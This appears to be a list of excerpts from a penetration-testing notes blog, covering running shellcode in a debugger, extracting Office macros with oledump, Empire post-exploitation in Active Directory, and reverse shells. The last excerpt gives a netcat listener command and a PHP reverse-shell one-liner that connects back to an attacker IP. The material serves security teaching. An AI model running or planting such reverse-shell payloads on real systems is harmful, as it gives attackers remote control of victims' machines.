- See also the Buffer Overflow post. Execute shellcode. Scenario: You have shellcode. You want to run it to analyze it in a debugger. On Windows: Add the shellcode after the breakpoint with i686-w64-mingw32-cc s.c -o s.exe or x86_64-w64-mingw32-cc s.c -o s.exe and run it in a debugger. On Linux: Add the shellcode after the breakpoint with gcc [-m32] s.c…
- Generic analysis tools. Extract macros with oledump: Use oledump.py to extract macros. List the file contents: python oledump.py $file. Example from an output: ... 7: M 16267 'Macros/VBA/NewMacros' 8: m 932 'Macros/VBA/ThisDocument' ... To show details from a document part, use the first number and execute python oledump.py -s $no $file. But to extract Macros,…
- Mainly post exploitation for AD environments. (Download — also included in Kali sources) Quick usage for privilege escalation. General usage. Metasploit syntax / PSE syntax. Note: After usemodule, don’t forget to go “back” and to “interact” with the agent to see job results! Commands with an asterisk require a high-integrity Empire Agent. To upgrade one…
- IF THE METERPRETER SHELL GETS STUCK, TRY PRESSING ENTER MULTIPLE TIMES ON THE VICTIM. Setting up: Listen on a system that can be reached, e.g. with nc -lnvp 9998 [l=listen,v=verbose,p=port,n=no_resolution]. Then initiate the connection from the target system. Here is an example directly in PHP: <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); ?> Another example, e.g. directly in a console…